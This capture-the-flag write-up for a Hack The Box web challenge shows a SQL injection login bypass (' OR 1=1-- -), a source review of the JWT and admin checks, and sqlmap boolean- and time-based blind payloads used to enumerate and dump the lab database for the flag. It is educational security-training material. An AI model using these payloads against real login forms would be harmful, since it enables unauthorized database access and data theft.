# Description
The evil elves have changed the admin access to Santa's Toy Management Portal. Can you get the access back and save the Christmas?

# Challenge
- We can download the source of the file.
- There's a login page, trying basic SQL Injection `' OR 1=1-- -` and we can enter the site as user `manager`
- It lists out the approved toys for manager, we also get a JWT token.
```json
{
  "username": "manager",
  "iat": 1638512781
}
```
- Other than that not much to see.
- Let's review the files

# Reviewing files.
- `database.js` is just doing queries which are not that important
- `database.sql` contains the credentials and flag
```sql
INSERT INTO `users` (`id`, `username`, `password`) VALUES
(1, 'manager', '69bbdcd1f9feab7842f3a1c152062407'),
(2, 'admin', '592c094d5574fb32fe9d4cce27240588');

INSERT INTO `toylist` (`id`, `toy`, `receiver`, `location`, `approved`) VALUES
(1,  'She-Ra, Princess of Power', 'Elaina Love', 'Houston', 1),
(2, 'Bayblade Burst Evolution', 'Jarrett Pace', 'Dallas', 1),
(3, 'Barbie Dreamhouse Playset', 'Kristin Vang', 'Austin', 1),
(4, 'StarWars Action Figures', 'Jaslyn Huerta', 'Amarillo', 1),
(5, 'Hot Wheels: Volkswagen Beach Bomb', 'Eric Cameron', 'San Antonio', 1),
(6, 'Polly Pocket dolls', 'Aracely Monroe', 'El Paso', 1),
(7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0); 
```
- in `helpers` and `JWTToken.js` the secret is random generated. Token is signed and verified
```js
const SECRET = crypto.randomBytes(69).toString('hex');
```
So no chance of brute-forcing

- In `middleware` and `AuthMiddleware.js` it's just checking the JSON token
- In the folder `routes`, index.js is checking if our username is equal to `admin`
```js
router.get('/api/toylist', AuthMiddleware, async (req, res) => {
        return db.getUser(req.data.username)
                .then(user => {
                        approved = 1;
                        if (user[0].username == 'admin') approved = 0;
                        return db.listToys(approved)
                                .then(toyInfo => {
                                        return res.json(toyInfo);
                                })
                                .catch(() => res.status(500).send(response('Something went wrong!')));
                })
                .catch(() => res.status(500).send(response('Something went wrong!')));
```
It will then return the list of toys with `approved = 0 ` which is the flag.
- Other than, nothing else was interesting. The admin credentials don't work in the real app.

# Exploit
- I tried tampering and modifying the JWT token but since it's being verified it won't work.
- Since we know that the login page is vulnerable to SQL Injection, we can save the request using Burp and send it to SQLMAP
```http
POST /api/login HTTP/1.1
Host: 178.62.32.210:32095
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://178.62.32.210:32095/
Content-Type: application/json
Origin: http://178.62.32.210:32095
Content-Length: 45
Connection: close

{"username":"manager","password":"bigsanta!"}
```
- SQLMAP detected 2 injections
```sql
Parameter: JSON username ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause 
    Payload: {"username":"manager' AND 9221=9221 AND 'QSBU'='QSBU","password":"bigsanta!"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"manager' AND (SELECT 5478 FROM (SELECT(SLEEP(5)))FSCi) AND 'zxdJ'='zxdJ","password":"bigsanta!"}
```
- We can fetch the database using `--dbs`
```sql
information_schema
toydb
```
- And fetch tables using `--tables` from toydb
```sql
toylist
```
- Now lets just dump it all using `--dump`
- It's going to take a while since it's using time-based injection
- After a while
```sql
+----+-----------------------------------+----------+-------------+----------------+
| id | toy                               | approved | location    | receiver       |
+----+-----------------------------------+----------+-------------+----------------+
| 1  | She-Ra, Princess of Power         | 1        | Houston     | Elaina Love    |
| 2  | Bayblade Burst Evolution          | 1        | Dallas      | Jarrett Pace   |
| 3  | Barbie Dreamhouse Playset         | 1        | Austin      | Kristin Vang   |
| 4  | StarWars Action Figures           | 1        | Amarillo    | Jaslyn Huerta  |
| 5  | Hot Wheels: Volkswagen Beach Bomb | 1        | San Antonio | Eric Cameron   |
| 6  | Polly Pocket dolls                | 1        | El Paso     | Aracely Monroe |
| 7  | HTB{1nj3cti0n_1s_in3v1t4bl3}      | 0        | HTBland     | HTBer          |
+----+-----------------------------------+----------+-------------+----------------+
```
